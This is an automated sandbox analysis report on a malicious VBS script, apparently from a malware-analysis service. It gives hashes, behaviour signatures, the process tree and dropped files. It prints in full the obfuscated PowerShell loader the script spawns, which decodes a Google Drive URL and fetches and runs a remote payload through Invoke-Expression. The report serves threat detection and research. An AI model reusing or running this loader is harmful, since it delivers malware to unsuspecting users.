Analysis

  • max time kernel
    93s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08/06/2024, 07:17

General

  • Target

    dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs

  • Size

    25KB

  • MD5

    e21aac072a10d80842d362743e1ffa59

  • SHA1

    d8b3aeffe2eedc17e06bafecd26b603c6a8908b9

  • SHA256

    dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde

  • SHA512

    7046ea4afb9ce9b490bf4fd7f2db533bded2eefc88dc64a80809f5e7fef6d184b2259a15cb06f6f1ebb92dcbd1a9b5f8d471ae1201557d07075827ad2a7ffa78

  • SSDEEP

    384:r0Dk2uAnMKYHzkvaZGxeecfCPNPh7ZbIxUXGDZ6SMTXJ7pZXi7m4d4ud0oekM25z:r0o2/YHocW9ZUxa6K5i5B75aFzoWLv3K

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tubas = 1;Function Brigaderen($Tautegory){$Chomper=$Tautegory.Length-$Tubas;$Fremkalderskaalene='Substring';For( $Varicelloid=7;$Varicelloid -lt $Chomper;$Varicelloid+=8){$Rumfangsformler+=$Tautegory.$Fremkalderskaalene.Invoke( $Varicelloid, $Tubas);}$Rumfangsformler;}function Eritreansk($Gnubbe){ . ($Rimesters) ($Gnubbe);}$Gauffering75=Brigaderen ' IsobioMSuper eoKarleagzdetekteiHyd icalVanillalcopitapaReh.ndl/Sgefu.k5jagtudf.R.versi0 l.ntie Al.enat(BigeminW rediviguldaldn cepterd jogschoPro toow Efte ts Potli, VulkanbNMisstatTAdenody Tetraf1 .ymeno0,tuccos.Coprodu0Radarov; Isoch Allerp.WUdbudsmi KloofenSque.ch6aesthet4Galskab;peachi, Kont.ahx Gldsfo6 Omn pr4 Gibb r;Bevidst Indha,rLnniveavSensiti:Afg.fts1Brepose2Dioptid1 Horrid.K,melwa0Antropo)Vederkv LinjeriGUforudseTrouveucLatestrkSwoonedo ,azoca/Biote n2Benedic0Usurp r1Frembyd0skabera0Kvilibr1Uneq.ab0Ne.lige1Stanges ,eprofoF DomeniiOnt.logr HymenoeFestm dfTegnekooTainofoxPakse.s/a,ledes1Sitolog2Swahili1 Anmass. Phytol0Bis.ten ';$Skyl96=Brigaderen 'T istedULanternsDesil,cePeriodfrLandbru-postverAKrad.ergFoliatoeFaatallnWe,ooletFormule ';$Sommerlejrs=Brigaderen 'SynoekyhMellititAudiofot KinnikpT akeoesUdrykni:Ser.ice/ Quisli/Neur.med LavaerrS.ayboliPrsteskvUdsendoeTings,e. Raimeng Funde oAnt.ropo Orbitsg Ci,ronlTvangsae Dis as.NewtonkcBrislino mitsomm Glorif/ BestrauNupt,alcAvleres? 
skrivee,afjulex.rnnegap RescoroHovedpirXeromortFlamini=InterlidReko,vaouskaanswfjset mnDgneneolUnrev roFrilleraSmaaligdPrealle& RecitaiParafradTakneml=Dagsomm1.ationaURunesteaV.rksomEAnlgstj6.ennierA Over.t9RadioakoU,rligsGimdeg.aNLuftvrd6 WildfoEGo lsspLEkst,ab_ un eekvHolognadKreisfuvBesttergDa.nissORecessiv,everymOUnfraud4 ,nnovaN Do,rpihi,cipieMVandyke5TvelydeaCourtroVContrabVpreaggrl RverkuA.ejlmeldC,oruseOUnderst ';$Underetagens=Brigaderen '.olitur> Atomke ';$Rimesters=Brigaderen 'Bl.ckiniInflatieMala,maxColiand ';$Outkicked='Studiebesg';$Materialprvning160 = Brigaderen 'U contre Aggresc Bruddeh imdesaoSk.llen Analys%Av nceraPostvsepFangedepTowboatdSamfundaAbsoluttReificeaMestern%Bjlena,\ MultisCQuaintea,rooklymPaxillapTiebo.thosseocao Op niar SolidaaMumpme,tOverflyeHugge,e.JonosfrI.ndecimnSkip.edtSullied Narcoba&Sightse&Marchen AbrasaxeByfo.edcAsilusbhVandforoFolkeva Staalvt Catost ';Eritreansk (Brigaderen 'Piastre$ WantwigSvalegalToadi.roMisdi.ibKonjunkaArbejd l Tandpa:RetorsiRbeknigheNeurot cArbejdsaDo ahshlRingmrkcOverdiliD masketFredlysrPaeonysa Hkerkvt VentaiiRipo,fsoGlas.blnHazel o=fortynd(Fore.skcOverma,mkontokud Efters Antioxi/Be,vangcFremskr Restau$AntepagM CaconyaS,yggert ,attedeIndbererdresseriDiscomma esaticlVrdiladp JordberLgnede.vShithean StyriniDametvanCubomedgFen,ici1Rivalin6K,ntine0Hastesa) An,ass ');Eritreansk (Brigaderen 'Knytte,$RestuffgH.ightslVillachou.gkarlbpy,anssaLabbe,elfolkepa:PhotoporNonintreMacedois UdspritAldohepiMicrocaaNonneglcSuccesle FlygtnoRefingeu SamarbsFor.ikr=Constri$ScablanS HalopeoShoneysmMaca.ammMegathee StikpirGebinddl FrikadeOpacifij PalliarMyxopods Rooibo. 
PiberesTeaerl,pPhotodelReconceiIsocardtVanskab(Cosmopo$ FirvreU FuskthnHockeysdSaalegne.ythagorPseudo eBiochipt Bioscoa BasarsgredigereHokeyconPrelatesBrunrod)Whensoe ');$Sommerlejrs=$restiaceous[0];$Fjerdedeles= (Brigaderen 'For,rin$BrakpljgEmbed mlsammenkoSystemibRecomf a SidetalZygophy:PhysiopDN dkulesC.rdifoi,rdikengRegrabb=GennembNTraheeneBlondelwDraabne-MissampOCyanomeb H.ppenj kandideInternacRabbinatSendeti CinnamoSramp neySupere,sEksplictCyanamieTegneb.mStoress.UgennemNTran,ple godfretFunktio. Kro,odWLdermbleBystandbUnde.paCneonreklHenseeniI relateSildigenIncorpst');$Fjerdedeles+=$Recalcitration[1];Eritreansk ($Fjerdedeles);Eritreansk (Brigaderen 'Incom,l$ForshapDFa cines SeamosiUnthrivgMorion..MutuallHbefordre Amtr caUnte,podDisinfeeStringmrPuruloisSalolda[Ci cums$venere SFizzkn kBeskyttyBu,dfarlSu,erla9Tenorsa6Sammenl]Litoral=Dispens$ paavisG .etameaBut,kopuEftera fN keligfHypodereSak istrBoligbeivoldshan Dokumeg Afs,ri7Afgjord5Veinies ');$Georgians=Brigaderen ' Warmho$ .izequDStoedtdsbaroksti MeowsrgS.illin.Fjer itDHemicenoExponibwSp.rtsfnPladskrl Indu.topalstafaA,mstoldDeposi,F AnbriniTrikololRuflende Tegl,n(Underkj$DeklassSCompulso BrostemMahalapm Fag ideOpvarmer .nkasslformalieunmol.sjSlackenrKoppev,sDefinit,Politik$SkisporMStolemarAmetabok PingueeorbiculsB,selbeaAssa sigHindbrmeIrrepenrBvresdenGawbyloe UppbadsH.stori2Helsink2gyn dio9U,raabs) .ejrst ';$Mrkesagernes229=$Recalcitration[0];Eritreansk (Brigaderen 'Sabel,i$Disor,egSpaanpllCancio oTende cbProlixiaP.acidnlR sprmi:KatetenMDrmmereoAs ptolsDrumloieyesotiddEurus.beBowl.ss=Mishags(Lionis.TPresseeeRespectsTe.oristUnprotu-Paatr,kPUnoperaacryogentPas ourh Ang oc A vtage$Fort,ltMHsternerRevisiokCamelidepestaersInst.ncaHidkaldgExemptieSystemprAtomermnNanomete OuthypsMeshuga2 negois2Calpack9Sektere)Damasce ');while (!$Mosede) {Eritreansk (Brigaderen 'Vertika$Gtepag.gRepulsilDominanoAfspejlbFremtida aastoflfli,pet:kogerskUToksikodUdbud,tsinclusomCarinasyUnwhimpk etingkDiminiseUncolladUnabashe 
Hellig=,ovetin$UnhookstPerioptrcallipyuLigningeTis yks ') ;Eritreansk $Georgians;Eritreansk (Brigaderen 'SubetleS GudesatSloteneaUdskejerRek.isit S.para-GudgiveSAldolizlPilledbeMicromee Paral,pValdrap Miljakt4wardshi ');Eritreansk (Brigaderen 'Fetaost$EksemplganstteslFstemndoGiselanbBrucellaAtomhemlVaeltei:HypostoMM.skottoUbetonesNonaffieSikkerhdUndvrlie Klangf=Genindt(DemonstTWate,steDingless unr sutPoritef-DethronPRaaski.aK lonistMinensjhhobbyh, Foge,er$Vei.ersM be.ogtrGutturikHearseceTaliasbs baklysaMeddelagSniv,leeElskerir Ov,rlbnSe,iaeneLigenessTrkosts2 Snakel2 Owerle9Gangste) T atha ') ;Eritreansk (Brigaderen 'Bortfre$Sub lobgUsdeli.lTe,eskooSale wobKikke,taRealiv lAcetoth:De igraSLactuceuMeijizepPy,opesp unnito.ogiernsRitzymeibrskur.tLascarii OpridsoUncredinUltranaeSlittesrPilchernSeismogeLotionpsunbaste9siv pit6 Deling=Hyp,rvi$Tun,ellg ParlialBruustaoPennysibTri.lunaBeladyilCa,diog:Qu.nariSTh,rdisevelsestrOvereatgSkraalelTimelofoHighbinb M.ssekuFrizadolHundekuiMander n Eflreh+ Co,nte+ Tumlin% ,emiau$bisayanrCamailseGhostf.sKitchentgluciddiCoggledaSmileryc Egen,ie Bog aroFortaleuDeclinesPepin.l.BnkendecYeomanho Ste nuuPlatyrrn otifitSki,rco ') ;$Sommerlejrs=$restiaceous[$Suppositionernes96];}$Udmrker9=329315;$Betjentene=28891;Eritreansk (Brigaderen '.adioas$ .esvergMangelllOvertemo InnuatbVenligha anuttlVikl,ng:.ndianeSfagstudtBkkenbuuVagtskip forbrneB.silicfAksemagiAbbrevieCommissr nsehol Trnere=hyg,eni Sk,etsoGZygota.eEx,alantstvstor-MaskensCBoardinoTopogranGudstjetGu.dsmeeCentaurnStrudsmtUninter Underf$Int,midM L.keror He,tevk Perinee.nopskys,rebaneaAfbarkeg acunareskorsterFremlaenHaystaceCarnivosTvangsi2Fikserb2Antagon9.orship ');Eritreansk (Brigaderen ' R,sgif$OmvisnigSubcomml RetrogoHou,elebKontohaaPeck kal Algebr:ReabsoreLogli enEncroacgdobbeltrPalaeobo BacksesMe.ernepEqu.cosr Hvaleri tejst,sErhver,eterpentrGnavernnHovedhjeOv rhitsPilgrim Lrebo s=Disa,fe Umyndig[F totekS 
BadestyRondelesRestriktPrologied.svulnmDebitso.Su.tesgCFeller.oUndervanAfmyto,vTildrage SemisirBetjenitWhitewa]Purpure:vestitu:NuzzerkFIntratrr IsraeloSharon,mSerienuBBigeminaBambu,ms Assotse ,ubten6Medtage4 k ravaSRoerenttHilltoprDesignli promenn tidiphgTruantl( Remoti$SlappetSIntell tPi,paycuStraffepBrdskreebra,kedf ,tinkaiMilj eee SexiporStyrkel)Trepidl ');Eritreansk (Brigaderen 'Per.spl$Surpr.cgSejlspolRadereto Epi,iabPredeleareshowelFrisken:jammerlSnondetrnVillaseu UnsmokgSpgelsegAfstamnlDngendeyLegatkr Indlade=Alenepi Venst,e[Enwe veSAnallany H,linesVoldf tt Ken.aueSvidesumBromate.Hovel,iTBadeniceDeklamax NonrattEmpathi.EngraftEBe,alusnBle endcSubtopioFlorizidMedarbei,ancuninIndustrgblkhusu]Varskor:U,splen: OverseAIm roprS okumeCTrningsIDerivatIForuren.SlingreG KrigsmeDesperatHandglaSHo.ocert Hoevisr SimbliiLdigerenPetuniegudkonku(Vestmen$Bi,telee ProgranC,ntraegMantaudrLochinooFirebrisV,versbpSodak,gr,ngarebiUrpremisReemergeReexprerVrdifasnRanidpreUnshipwsCo.mand) Snesko ');Eritreansk (Brigaderen 'Amylans$BlennotgLjerliglKul.urboArbejdsbD,mfldtaCleanlilSinfoni:kl,pperOOmklassnIllegaldindtal uDenimsnl GldesleRaavildrGlidebaeLineolad DobbeleVand.ogsForuren=Erwinco$TrilogiSSurahipnVariantuCha,ottg P.rtrtgDisservlSka aerySkiftva.Douchins AfkalkuR stendbVolatilsIstr,ant Fonetir Insurri SamsennEsdragogForrib (Skjalde$Vug,iesU irginidEternizmStrapher GlippekPennepreSmirk urLedeord9Sendere,Uncount$OverdecB Daabsfe Vaagebt Rotatij Dyret e .ageannPrydsastHeptrane Re.tetnConcerteReds.ar)incurre ');Eritreansk $Onduleredes;"
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Camphorate.Int && echo t"
          PID:1180

    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Copolymerise.txt

            Filesize

            8KB

            MD5

            19c2705572794894cfb99f2e8a39e54a

            SHA1

            bbb7ed43de4aa50aaee18cfa4cfb9e00ec834d5c

            SHA256

            24a1748ccda00bef2a8f1ad7a464a30d9215a04e72710dd8ce1e8b3c7ee90c99

            SHA512

            7dd8667ca72a4400dc245736f7fd712f85cf5a5459c06f706f6a320f79f8b6696ded2d7f97c79b1957fcf6f442b8a65fc7134b123d64ea732fd65853cf29c1df

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0sxdlstl.5lr.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/3644-313-0x00007FFE89773000-0x00007FFE89775000-memory.dmp

            Filesize

            8KB

          • memory/3644-314-0x000001F412B10000-0x000001F412B32000-memory.dmp

            Filesize

            136KB

          • memory/3644-324-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

            Filesize

            10.8MB

          • memory/3644-325-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

            Filesize

            10.8MB

          • memory/3644-328-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

            Filesize

            10.8MB

          • memory/3644-329-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

            Filesize

            10.8MB

          • memory/3644-332-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

            Filesize

            10.8MB